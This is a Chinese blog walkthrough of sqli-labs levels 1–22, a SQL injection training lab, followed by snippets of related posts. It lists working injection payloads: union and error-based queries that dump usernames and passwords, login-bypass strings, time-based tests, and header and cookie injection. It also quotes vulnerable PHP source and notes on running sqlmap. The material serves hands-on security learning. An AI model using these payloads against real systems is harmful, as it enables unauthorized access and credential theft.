sqli-labs Basic Challenges(less1-less22)

最新推荐文章于 2025-05-16 11:14:39 发布
最新推荐文章于 2025-05-16 11:14:39 发布
阅读量174 收藏
点赞数
分类专栏: web安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43635212/article/details/108313538
版权

这一部分是比较基础的SQL注入练习,适合入门。
考点在图中已经都说明了。
在这里插入图片描述
常用闭合方式:
单引号''、双引号""、括号()、括号+单引号('')、多层括号+单引号,例((((((((''))))))))。另外mysql还可以使用括号+双引号("")和多层括号+双引号((((((((""))))))))

less-1 get基础

请求方式:get
拼接方式:id=‘$id’
注入类型:联合、报错、布尔、延时
payload:?id=-1'  union select 1,group_concat(username),group_concat(password) from users --+

less-2

请求方式:get
拼接方式:id=$id
注入类型:联合、报错、布尔、延时
payload:参考less-1

less-3

请求方式:get
拼接方式:id=('$id')
注入类型:联合、报错、布尔、延时
payload:参考less-1

less-4

请求方式:get
拼接方式:id=("$id")
注入类型:联合、报错、布尔、延时
payload:参考less-1

less-5

请求方式:get
拼接方式:id='$id'
注入类型:报错、布尔、延时
payload:?id=1' and (select 1 from (select count(*),concat((select concat(username,password) from users limit 0,1),floor(rand(0)*2)) x from information_schema.tables group by x) a )--+

less-6

请求方式:get
拼接方式:id="$id"
注入类型:报错、布尔、延时
payload:参考less-5

less-7

请求方式:get
拼接方式:id=(('$id'))
注入类型:布尔、延时
测试:?id=1'))  and 1=1 --+

$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";

用SQLMAP跑一下:
在这里插入图片描述
在这里插入图片描述

less-8

请求方式:get
拼接方式:id='$id'
注入类型:布尔、延时
测试:?id=1'  and 1=1 --+

less-9

请求方式:get
拼接方式:id='$id'
注入类型:延时
测试:?id=1'  and sleep(5) --+

less-10

请求方式:get
拼接方式:id="$id"
注入类型:延时
测试:?id=1"  and sleep(5) --+

less-11 post基础

从这里开始请求方式变为了post,post不能传输某些特殊字符,所以将+号替换成空格
在这里插入图片描述
这里没有对输入做任何的过滤,所以可以很轻松的登录进去

 #注释掉 passwd 来登录
uname=admin'-- &passwd=1&submit=Submit
uname=admin'#&passwd=1&submit=Submit

 #注释后面语句 并 添加一个永真条件
uname=admin&passwd=1' or 1-- &submit=Submit
uname=admin&passwd=1'||1-- &submit=Submit
uname=admin&passwd=1' or 1#&submit=Submit
uname=admin&passwd=1'||1#&submit=Submit

 #闭合后面语句 并 添加一个永真条件
uname=admin&passwd=1'or'1'='1&submit=Submit
uname=admin&passwd=1'||'1'='1&submit=Submit

获取账号密码方式和less-1差不多

请求方式:post
拼接方式:username=’$username’
注入类型:联合,报错,布尔,延时
payload:uname=admin&passwd=1’union select 1,group_concat(username,password) from users#&submit=Submit

SQLmap跑一跑:
用burpsuite拦截包后保存为post.txt
在这里插入图片描述
发现存在四种方式的漏洞:
在这里插入图片描述
查看账号密码:
在这里插入图片描述
在这里插入图片描述

less-12

请求方式:post
拼接方式:username=("$uname")
注入类型:联合,报错,布尔,延时
测试:uname=admin")#&passwd=1&submit=Submit

less-13

请求方式:post
拼接方式:username=('$uname')
注入类型:报错,布尔,延时
测试:uname=admin')#&passwd=1&submit=Submit

登录以后只提示登录成功,所以不能使用联合注入

less-14

请求方式:post
拼接方式:username="$uname"
注入类型:报错,布尔,延时
测试:uname=admin"#&passwd=1&submit=Submit

less-15

请求方式:post
拼接方式:username='$uname'
注入类型:布尔,延时
测试:uname=admin'#&passwd=1&submit=Submit

less-16

请求方式:post
拼接方式:username=("$uname")
注入类型:布尔,延时
测试:uname=admin")#&passwd=1&submit=Submit

less-17

这里开始不再是让你登录了,让你修改密码:
在这里插入图片描述
查看源码发现这里对于用户输入的用户名做了过滤,’、"、\等特殊符号被转义了。但是对于输入的新密码却没有检查。

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))

{
//making sure uname is not injectable
$uname=check_input($_POST['uname']);  

$passwd=$_POST['passwd'];


//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname."\n");
fwrite($fp,'New Password:'.$passwd."\n");
fclose($fp);


// connectivity 
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";

$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
	{
  		//echo '<font color= "#0000ff">';	
		$row1 = $row['username'];  	
		//echo 'Your Login name:'. $row1;
		$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
		mysql_query($update);
  		echo "<br>";

所以要从new password突破,当用户名输入admin,新密码输入1’时:
在这里插入图片描述
提示了报错信息,所以可以使用报错注入:
uname=admin&passwd=1’ and (select 1 from (select count(*),concat((select concat(username,password) from users limit 1,1),floor(rand(0)*2)) x from information_schema.tables group by x) a )&submit=Submit
在这里插入图片描述

less-18 http字段的利用

请求方式 post	
闭合方式 '
注入方式 联合,报错,布尔,延时
注入点 user-agent字段

关键部分代码:

if(isset($_POST['uname']) && isset($_POST['passwd']))

	{
	$uname = check_input($_POST['uname']);
	$passwd = check_input($_POST['passwd']);

	$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
	$result1 = mysql_query($sql);
	if(查询成功)
			$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
			mysql_query($insert);
			print_r(mysql_error());			
			}
		else
			{
			print_r(mysql_error());
			}

	}

这里对用户名和密码都做了过滤,突破点在$insert语句。

我们经常用:HTTP_X_FORWARDED_FOR来伪造IP,但是这里使用的是REMOTE_ADDR无法修改,所以只能通过修改User-Agent。
因为这里会显示报错信息,所以可以使用基于错误的注入:
1 ’ and (select 1 from (select count(*),concat((select concat(username,password) from users limit 0,1),floor(rand(0)*2)) x from information_schema.tables group by x) a ) and ‘1’='1
由于是插入语句,所以加上and ‘1’='1用于闭合。
在这里插入图片描述

less-19

19和18差不多
正常登陆以后提示:
在这里插入图片描述
修改refer字段即可:
在这里插入图片描述
在这里插入图片描述

less-20 cookie利用

请求方式:post	
闭合方式 :'
注入方式 :联合,报错,布尔,延时
注入点 :cookie字段

登陆进去以后:
在这里插入图片描述
给出了cookie的一些信息,按f12查看cookie信息,将uname改为admin’试一下:
在这里插入图片描述
报错了,试一下group by:

在这里插入图片描述
联合查询:
在这里插入图片描述
使用SQLMAP level2跑一下也能发现存在四种方式的注入:
在这里插入图片描述
注意这里用的是cookie包

less-21

请求方式 :post	
闭合方式 :')
注入方式 :报错,布尔,延时
注入点: cookie字段(base64)

在这里插入图片描述
与less20不同的是,这里cookie值采用了base64编码

SQLMAP需要制定 --tamper参数来设置payload的编码:
在这里插入图片描述
在这里插入图片描述

less-22

请求方式 :post	
闭合方式 :"
注入方式 :联合,布尔,延时
注入点: cookie字段(base64)

这里SQLMAP扫出来是说有error-based,但是实际上报错时只会显示一张图片:
在这里插入图片描述
参考:https://www.sqlsec.com/2020/05/sqlilabs.html#toc-heading-36

SQLi-LABS Page-1Basic Challenges(基本挑战)
weixin_72459450的博客
07-06 842
8,输入错误的账号,密码(防止影响输出结果)使用 union select 1,group_concat(concat_ws(':',username,password)) from security.users语句,得到:Dumb:1,Angelina:1,Dummy:1,secure:1,stupid:1,superman:1,batman:1,admin:admin,admin1:1,admin2:1,admin3:1,dhakkan:1,admin4:1
SQLi-LABS Page-1(Basic Challenges)通关攻略
han14735828432的博客
08-14 1190
SQLi-LABS Page-1 通关攻略
SQLI-LABS LESS 1-LESS 22
weixin_33946020的博客
06-10 246
SQLI-LABS LESS 1-LESS 22 0x01:前言 因为最近感觉手注快忘光了,所以玩一遍sqli-labs巩固一下。 sql注入,基于从服务器接收到的响应分类为 : ▲基于错误的SQL注入 ▲联合查询的类型 ▲堆查询注射 ▲SQL盲注 •基于布尔SQL盲注 •基于时间的SQL盲注 •基于报错的SQL盲注 0x02:环境搭建 基础环境为LAMP,...
SQL注入篇——sqli-labs最详细1-40闯关指南
热门推荐
爱国小白帽
01-11 3万+
使用sqli­labs游戏系统进行sql注入 1.首先确定用哪些字符可以进行sql注入 一.选择Less­1进入第一关,在网址中添加标红内容,显示了用户和密码 http://localhost/sqli­labs­master/Less­1/index.php?id=1’ and 1=1 ­­ ­ 把1=1改成1=2,不报错也不显示任何信息,说明可以利用 ’ 字符注入 二.进入第二关,在网址中添...
SQLI-LABS(Basic Challenges)
volcano的博客
12-04 1099
sql注入 SQL注入是比较常见的网络攻击方式之一,一般分为数字型和字符型,攻击者在HTTP请求中输入含有恶意构造且语法合法的SQL语句,只要应用程序中没有做严格的处理(例如校验或预拼接),那么就会出现SQL注入漏洞危险。 Sqli-labs Sqli-labs-master是一个用来学习sql注入的闯关游戏。 之前看的教程中,普通题目大多数都是用union联合查询注入的,我用的是基于updatexml()函数的报错注入,这里也是参考大佬的博客慢慢学习。 函数解释:   UPDATEXML (XML_doc
SQLI-LABS——Page-1 Basic Challenges Less-1~Less-20
Ho1aAs‘s Blog
03-28 592
文章目录前言题解Less-1Less-2Less-3Less-4Less-5Less-6Less-7Less-8Less-9Less-10Less-11Less-12Less-13Less-14Less-15Less-16Less-17Less-18Less-19Less-20完 前言 记录一下SQLI-LABS基础部分前二十题,(某些题目只爆出了库名 以下是盲注tips: 时间盲注 报错注入 布尔盲注 题解 Less-1 最简单的单引号字符型注入,回显点有两个,注入两个group_cocnat() [
sqli-labs Basic Challenges Less 11-12
守卫者安全
04-01 242
Less 11 POST - Error Based - Single quotes- String 从题目来看这一关跟之前的都不一样。这是post方式的基于报错的单引号字符型注入。 打开链接页面显示如下: 先随便输入一个用户名和密码比如ceshi ceshi进行尝试 再用前几关得到的用户名密码尝试登陆,比如Dumb 可以看到登陆成功页面显示的样子。 既然这里只有登陆框,...
SQLi-LABS Page-1(Basic Challenges)1-22
05-18
### SQLi-LABS Page-1 (Basic Challenges)1-22 知识点解析 #### 第一关:Less-1 - 字符型注入 在这一关卡中,我们需要找到一个可注入点,并通过该点执行SQL注入攻击。具体步骤如下: 1. **访问靶场**: - 访问...
SQLi-LABS Page-1(Basic Challenges)1-22
05-18
### SQLi-LABS Page-1 (Basic Challenges)1-22关详解 #### Less1: GET 字符串型基于错误的单引号的注入 在本关中,我们需要利用一个带有`id`参数的GET请求来进行SQL注入。当尝试输入`id=1`时,并在URL末尾添加单...
SQLi-LABS Page-1(Basic Challenges)
07-24
在"SQLi-LABS Page-1 (Basic Challenges)"中,一系列的关卡设计用于帮助学习者理解并实践SQL注入的基本概念和方法。 在CTF(Capture The Flag)网络安全挑战赛中,SQL注入是一种常见的技能测试。在这个挑战中,从...
sqli-labs】闯关记录17~20
qq_43665434的博客
03-10 216
sqli-labs】闯关记录17~20 【less-17】基于密码的报错注入 1、源码分析 <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); function check_input($value) { if(!empty($value)) { // truncation (see comments)
SQLi-Labs 学习笔记(Less 11-20)
Onlyme的博客
03-11 1226
点击打开链接Less-11 基于错误的POST型单引号字符型注入①先打开网页查看 Welcome Dhakkan②查看源代码:[php] view plain copy&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transition...
sqli-labs Basic Challenges Less-1
守卫者安全
03-23 290
Sqli-labs是一个练习sql注入非常nice的一个靶场,几乎涵盖了所有的注入类型。我们从今天就开始以这个靶场为基础学习sql注入吧。 靶场的安装十分简单,这里就不再过多阐述了。安装完成靶场的界面如下: 可以看到总共有4种不同难度的划分,先点击Basic Challengs看看最基础的。 基础注入一共有22关,让我们开心的学习起来吧。 ...
sql的学习以及sqli-lab靶场练习
RealIiikun的博客
03-07 821
sqlilab的靶场练习
SQL注入13】referer注入基础及实践(基于BurpSuite工具和Sqli-labs-less19靶机平台)
Fighting_hawk的博客
02-21 5451
1. 了解referer的含义与作用; 2. 掌握referer注入的方法。
WEB安全--Java安全--shiro550反序列化漏洞
最新发布
m0_74800552的博客
05-16 292
shiro550反序列化
安全巡检清单
yh
05-15 878
软件状态巡检应深入到系统内核层面。漏洞扫描是软件状态巡检的重要组成部分,需要定期对网络设备、主机、数据库、应用系统等进行全面的漏洞扫描,利用专业的扫描工具发现已知和未知的安全漏洞。通过严格执行本清单所列的各项检查内容,并结合企业自身的业务特点和安全需求进行适当调整和补充,可以有效地提升信息系统的整体安全水平,降低安全风险,为企业的稳健发展提供坚实保障。通过周期性的状态检查、安全扫描、日志分析和补丁管理,可以及时发现并修复潜在的安全隐患和漏洞,确保网络设备、服务器、操作系统及应用系统的高可用性和安全性。
安全版4.5.8开启审计后,hac+读写分离主备切换异常
HighGO
05-16 222
异常:hac集群一主两备环境,开启hgproxy和审计功能后,进行集群主备切换操作。切换过程持续近5分钟,主库方可切换到备节点上,其中未参与切换(原主与新主外的备节点)的备库无法拉起,持续restarting状态很长时间后start failed。解决此问题的安装包:hgdb-see-4.5.8-6954d9f.aarch64.rpm。BUG安装包: hgdb-see-4.5.8-db43858.aarch64.rpm。1、临时解决方案:关闭审计功能,修改审计参数后需要重启集群。系统平台:UOS (飞腾)
AI智能分析网关V4周界入侵检测算法精准监测与智能分析,筑牢周界安全防线
NVR安防视频技术
05-14 533
随着安全防范需求的不断提升,传统周界安防系统存在误报率高、响应迟缓、智能化程度低等问题,难以满足现代化安全管理的要求。
MySQL注入实战指南——Sqli-labs教程解析
- **Less-1Less-16** 涉及一系列逐步增加难度的练习,如识别注入点、利用错误信息、基本的SQL命令执行等。 4. **第二部分:Advanced Injection** 进阶部分介绍了更复杂的注入技术,如: - **Background-6** ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值